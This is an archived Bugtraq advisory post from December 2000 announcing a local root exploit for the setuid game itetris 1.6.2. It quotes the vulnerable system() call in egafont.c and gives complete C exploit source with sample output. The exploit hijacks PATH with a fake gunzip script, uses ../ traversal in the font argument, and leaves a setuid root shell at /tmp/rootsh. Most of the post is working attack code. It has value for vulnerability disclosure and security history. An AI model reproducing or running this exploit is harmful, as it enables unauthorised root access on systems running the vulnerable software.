a/sec-itetris

Date:         Tue, 19 Dec 2000 06:34:13 -0000
From: Chris Sharp <v9@FAKEHALO.ORG>
Subject:      itetris[v1.6.2] local root exploit (system()+../ protection)
To: BUGTRAQ@SECURITYFOCUS.COM

i was auditing some svgalib(suid root) programs
and noticed itetris had a possibly exploitable
system(); call... which has since obviously proven
exploitable or i wouldn't be posting this message.
:)

ORIGINAL exploit url below(un-wrapped):
http://realhalo.org/xitetris.c



xitetris.c:
/* (*)itetris[v1.6.2] local root exploit, by:
v9[v9@fakehalo.org].  this will
   give you root on systems that have the itetris
game installed.  the program
   is installed setuid(0)/root due to svgalib. 
this exploits a system() call
   mixed with bad ../ protection, which makes this
possible -- considering it
   needs a font file to end with ".gz" to run
gunzip.

   explaination(egafont.c):
  
---------------------------------------------------------------------------
   [199/360]:char *FontPath, *FontPath1;
   ...
   [237/360]:unzipped =
strcasecmp(FontPath+fontheight-3, ".gz");
   ...
   [246/360]:sprintf(FontPath1, "gunzip -c %s >
%s", FontPath, tmp_file_name);
   [247/360]:system(FontPath1);
  
---------------------------------------------------------------------------
   
   example:
  
---------------------------------------------------------------------------
   # cc xitetris.c -o xitetris  
   # ./xitetris
   [ (*)itetris[v1.6.2] local root exploit, by:
v9[v9@fakehalo.org]. ]
   [*] checking /usr/local/bin/itetris for proper
file permissions.
   [*] done, /usr/local/bin/itetris appears to be
setuid.
   [*] done, making temporary files.
   [*] done, setting up environment variable(s).
   [*] done, launching /usr/local/bin/itetris.
(the screen may blink locally)
   [*] done, cleaning up temporary files.
   [*] done, checking /tmp/rootsh for proper file
permissions.
   [*] success! /tmp/rootsh appears to be set*id.
   [?] do you wish to enter the rootshell
now(y/n)?: y
   [*] ok, executing rootshell(/tmp/rootsh) now.
   # 
  
---------------------------------------------------------------------------
*/
#define PATH           
"/usr/local/bin/itetris"        // path to
itetris.
#define APPENDPATH     
"/tmp"                          // tmp dir to use.
#define EXECFILE       
"gunzip"                        // don't change
this.
#define FAKEFILE       
"xitetris.gz"                   // must end with
.gz.
#define SUIDSHELL      
"/tmp/rootsh"                   // root shell
location.
#include <stdio.h>
#include <sys/stat.h>
main(){
 char
cmd[256],tmpfile[256],fakefile[256],path[1024],input[0];
 struct stat mod1,mod2;
 FILE *suidexec,*fakegz;
 fprintf(stderr,"[ (*)itetris[v1.6.2] local root
exploit, by: v9[v9@fakehalo.o"
 "rg]. ]\n");
 fprintf(stderr,"[*] checking %s for proper file
permissions.\n",PATH);
 if(stat(PATH,&mod1)){
  fprintf(stderr,"[!] failed, %s doesnt appear to
exist.\n",PATH);
  exit(1);
 }
 else if(mod1.st_mode==35309){
  fprintf(stderr,"[*] done, %s appears to be
setuid.\n",PATH);
 }
 else{
  fprintf(stderr,"[!] failed, %s doesn't appear to
be setuid.\n",PATH);
  exit(1);
 }
 fprintf(stderr,"[*] done, making temporary
files.\n");

snprintf(fakefile,sizeof(fakefile),"%s/%s",APPENDPATH,FAKEFILE);

snprintf(tmpfile,sizeof(tmpfile),"%s/%s",APPENDPATH,EXECFILE);

unlink(fakefile);fakegz=fopen(fakefile,"w");fclose(fakegz);
 unlink(tmpfile);suidexec=fopen(tmpfile,"w");
 fprintf(suidexec,"#!/bin/sh\n");
 fprintf(suidexec,"cp /bin/sh %s\n",SUIDSHELL);
 fprintf(suidexec,"chown 0.0 %s\n",SUIDSHELL);
 fprintf(suidexec,"chmod 6755 %s\n",SUIDSHELL);
 fclose(suidexec);
 chmod(tmpfile,33261);
 fprintf(stderr,"[*] done, setting up environment
variable(s).\n");

snprintf(path,sizeof(path),"%s:%s",APPENDPATH,getenv("PATH"));
 setenv("PATH",path,1);
 fprintf(stderr,"[*] done, launching %s. (the
screen may blink locally)\n",
 PATH);
 sleep(1);
 snprintf(cmd,sizeof(cmd),"%s -VE
-F../../../../%s/%s 1>/dev/null 2>&1",PATH,
 APPENDPATH,FAKEFILE);
 system(cmd);
 fprintf(stderr,"[*] done, cleaning up temporary
files.\n");
 unlink(fakefile);unlink(tmpfile);
 fprintf(stderr,"[*] done, checking %s for proper
file permissions.\n",
 SUIDSHELL);
 if(stat(SUIDSHELL,&mod2)){
  fprintf(stderr,"[!] failed, %s doesnt appear to
exist.\n",SUIDSHELL);
  exit(1);
 }
 else if(mod2.st_mode==36333){
  fprintf(stderr,"[*] success! %s appears to be
set*id.\n",SUIDSHELL);
 }
 else{
  fprintf(stderr,"[!] failed, %s doesn't appear to
be set*id.\n",SUIDSHELL);
  exit(1);
 }
 fprintf(stderr,"[?] do you wish to enter the
rootshell now(y/n)?: ");
 scanf("%s",input);
 if(input[0]!=0x59&&input[0]!=0x79){
  printf("[*] aborted, the rootshell is:
%s.\n",SUIDSHELL);
 }
 else{
  printf("[*] ok, executing rootshell(%s)
now.\n",SUIDSHELL);
  execl(SUIDSHELL,SUIDSHELL,0);
 }
 fprintf(stderr,"[*] exiting program
successfully.\n");
 exit(0);
}